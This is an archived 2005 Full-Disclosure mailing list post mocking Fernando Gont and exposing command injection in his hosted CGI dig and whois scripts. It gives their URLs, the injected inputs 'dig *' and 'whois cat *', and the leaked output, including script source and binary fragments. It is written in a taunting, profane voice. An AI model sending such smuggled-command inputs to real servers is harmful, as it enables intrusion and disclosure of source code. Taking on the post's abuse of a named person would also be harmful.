lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu Aug  4 13:14:57 2005
From: joxeankoret at gmail.com (Joxean Koret)
Subject: Fernando Gont remote command execution and big
	mouth vulnerability

Oh I see... ppl loves to put ur name in their websites ... HEH!!!


u removed the link in the tools (dig) section of:
http://www.gont.com.ar   nice try ....

http://thor.prohosting.com/fgont/cgi-bin/dig.pl
http://thor.prohosting.com/fgont/cgi-bin/whois.pl

also your dig script have a directory listing bug... just adding * in
the query....


   dig *
; <<>> DiG 8.3 <<>> cgi-lib.pl cli.pl dig.pl fuente.cgi p1.txt
p1dig.txt p1host.txt p1ns.txt p1whois.txt p2.txt p2dig.txt p2h
ost.txt p2ns.txt p2whois.txt whois.cgi whois.pl
;; res options: init recurs defnam dnsrch


------

                                                                Gont's
web site - Tools - whois (p1 of 13)

                    Web Hosting | Free Web Hosting | School Websites |
Teacher Websites | VChocolates
                    [banner_sign_up.gif]
                    Chocolates | Toffee | Caramels | Truffles | Search
| Heavy Equipment | Fitness |

                                                          Tools
                                                          whois


                            whois(1) manual page
     _______________________________________________________________________________________________________________

   whois ________________________________________
     _______________________________________________________________________________________________________________

   whois cat *
# Perl Routines to Manipulate CGI input
# cgi-lib@...ox.com
# $Id: cgi-lib.pl,v 2.17 1998/05/14 22:39:23 brenner Exp $
#
# Copyright (c) 1993-1998 Steven E. Brenner
# Unpublished work.
# Permission granted to use and modify this library so long as the
# copyright above is maintained, modifications are documented, and
# credit is given for any use of the library.
#
# Thanks are due to many people for reporting bugs and suggestions
....

 Gont's web site
   Contact Fernando Gont at fernando@...t.com.ar
     _______________________________________________________________________________________________________________

   Gont's web site
   Contact Fernando Gont at fernando@...t.com.ar
     _______________________________________________________________________________________________________________

   Gont's web site
   Contact Fernando Gont at fernando@...t.com.ar
     _______________________________________________________________________________________________________________

   Gont's web site
   Contact Fernando Gont at fernando@...t.com.ar
   ELF D4?4 (444?@?@...````?`?T?X
????/usr/libexec/ld-elf.so.1FreeBSDS%+ ' )(!& $*%"
#???':?D/?T#???,?%1
   8??????`?
     ?Df???RT?Yt?????Yd?t?+????L??W?
   W]$[h4?libc.so.4warnx__stdoutpconnect_DYNAMICerrxoptargsocketfflushfreeaddrinfo_init_DefaultRuneLocalegai_strerrorenviron


......

"My site does not contan scripts" (since you removed the link).
"and is hosted on an OpenBSD server" Then fuck you and theo


Regards!!!
-------------- next part --------------
A non-text attachment was scrubbed...
Name: fgont.jpg
Type: image/jpeg
Size: 102456 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050804/a77018b3/fgont-0001.jpg

Powered by blists - more mailing lists